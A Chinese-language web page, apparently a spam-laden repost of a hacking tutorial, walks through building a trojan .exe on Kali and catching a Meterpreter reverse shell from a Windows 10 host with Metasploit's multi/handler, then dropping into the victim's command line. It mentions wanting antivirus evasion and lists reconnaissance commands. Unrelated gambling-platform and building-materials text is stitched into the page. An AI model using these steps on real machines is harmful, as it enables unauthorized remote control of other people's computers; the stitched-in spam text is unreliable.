首页_金牛3平台

四川建材 2021-06-01 阅读:315

在kali的/root目录下生成一个yhdxtn.exe的木马文件,将kali的ip地址和进行监听的端口提前设置好放入木马中。默认端口为4444

2.输入命令 msfconsole 启动Metasploit工具

输入命令 use exploit/multi/handler 使用handler模块。handler(句柄)

3.输入命令 set payload windows/meterpreter/reverse_tcp 设置有效载荷(payload)为刚才反向远程控制程序名称

4.设置攻击时的ip和端口,并用options命令查看。端口也可以不用设置,默认为4444端口,与第一条命令的端口保持一致即可

以上是对kali的设置,接下来需要将yhdxtn.exe这个木马弄到win10主机上,并想办法在win10主机上运行这个木马,最好再加一个免杀,防止被win10杀毒软件杀掉。这一块技术还不会,以后再补充。

我是手动将yhdxtn.exe放在自己的win10主机上,然后自己点开运行这个木马程序。

5.输入run/expolit都行 金牛3平台 此时并不能连接到win10主机,必须在win10主机上运行yhdxtn.exe之后才能连接上。

在win10主机上运行yhdxtn.exe之后,kali中才能进行接下来的操作。

运行木马后,kali中出现 meterpreter > 命令行,证明此时木马已成功执行

6.输入命令 shell ,即可进入win10主机的命令行界面,通过命令行来控制win10主机。

附win10一些常用的命令:

whoami:查看主机名和用户

c:切换到c盘

d:切换到d盘

ipconfig:查看网络配置情况

sysinfo:查看系统信息




这是四川改性挤塑板成都挤塑板,四川保温砂浆(2021-06-01 18:09:06)

评论(0)